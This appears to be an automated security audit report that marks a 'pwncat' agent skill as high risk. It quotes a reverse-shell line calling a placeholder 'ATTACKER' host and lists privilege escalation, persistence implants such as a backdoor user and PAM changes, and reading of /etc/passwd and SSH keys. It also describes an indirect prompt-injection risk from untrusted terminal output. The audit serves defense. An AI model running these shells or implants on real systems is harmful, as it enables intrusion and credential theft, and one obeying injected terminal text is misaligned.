pwncat
Fail
Audited by Gen Agent Trust Hub on Sep 5, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPRIVILEGE_ESCALATIONPERSISTENCEDATA_EXFILTRATIONINDIRECT_PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill provides extensive instructions for using the
pwncat-cscommand-line tool to manage remote shell sessions. - Found in
SKILL.mdandreferences/connection-modes-and-opsec.md, documenting listener setup and bind shell connections. - Documentation encourages executing shell commands on remote targets such as
id,uname -a, andchmod +x. - [REMOTE_CODE_EXECUTION]: The skill provides patterns for establishing interactive reverse shell connections.
SKILL.mdandreferences/connection-modes-and-opsec.mdcontain thebash -i >& /dev/tcp/ATTACKER/4444 0>&1pattern for target callbacks.- [PRIVILEGE_ESCALATION]: The skill details workflows to programmatically acquire elevated permissions on a target system.
SKILL.mdandreferences/module-workflow-cheatsheet.mddescribe usingescalate listandescalate runto discover and exploit privilege escalation paths, including recursive chaining to reach root.- [PERSISTENCE]: The skill documents the use of implant modules to maintain access across sessions.
SKILL.mdandreferences/module-workflow-cheatsheet.mddescribe installing authorized SSH keys viaimplant.authorized_key.- Documentation includes instructions for
implant.passwdto create backdoor users (svc-backup) andimplant.pamto modify authentication modules. - [DATA_EXFILTRATION]: The skill includes patterns for accessing and downloading sensitive configuration and identity files.
SKILL.mddemonstrates using thedownloadcommand for/etc/passwd.- Documentation references reading SSH identity files from
~/.ssh/id_rsaand~/.ssh/id_rsa.pub. - [INDIRECT_PROMPT_INJECTION]: The skill defines a workflow where the agent processes untrusted output from a remote target.
- Ingestion points: The agent reads and reacts to the output of a remote tty in 'remote mode' (documented in
SKILL.md). - Boundary markers: None provided; the agent is not instructed to disregard or sanitize instructions that may be emitted by the target system into the shell buffer.
- Capability inventory: Across all files, the skill grants the agent capabilities for shell command execution, file system modification, privilege escalation, and persistence management.
- Sanitization: There is no documented validation or escaping of terminal output before it is processed by the agent's logic.
Recommendations
- AI detected serious security threats
Audit Metadata